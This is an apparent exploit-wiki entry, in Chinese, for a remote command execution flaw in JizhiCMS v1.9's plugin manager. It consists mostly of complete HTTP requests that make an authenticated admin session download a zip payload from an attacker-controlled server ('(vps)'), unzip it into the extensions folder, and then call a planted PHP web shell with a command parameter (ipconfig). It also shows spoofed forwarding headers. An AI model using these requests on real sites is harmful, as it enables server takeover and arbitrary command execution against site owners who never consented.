Loading
0

极致CMS 远程命令执行漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

漏洞信息

该漏洞首发于奇安信攻防社区,原文在这里

影响版本

v1.9 All

前提条件

后台账号权限必须拥有权限插件管理(首页/管理员管理/角色管理/角色修改)

远程下载Payload

action=start-download&filepath=3&download_url=http%3A%2F%2F(vps)%2F1.zip

Attach-67956642173c696f50f89f1cc25dfc617a83c747.png

Attach-b17cbfb7b3891375823afc9d34bcc0ecff255317.png

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.108
Content-Length: 80
Accept: application/json, text/j avas cript, */*; q=0.01
X-Requested-With: X MLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.108
Referer: http://192.168.1.108/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
action=start-download&filepath=3&download_url=http%3A%2F%2F192.168.1.108%2F1.zip

解压Payload

action=file-upzip&filepath=3&download_url=
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.108
Content-Length: 42
Accept: application/json, text/j avas cript, */*; q=0.01
X-Requested-With: X MLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.108
Referer: http://192.168.1.108/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
action=file-upzip&filepath=3&download_url=

URLs

http://127.0.0.1//A/exts/<Compressed file directory>/1.php?1=ipconfig
http://127.0.0.1//A/exts/1/1.php?1=ipconfig

PWNWIK.COM==免费、自由、人人可编辑的漏洞库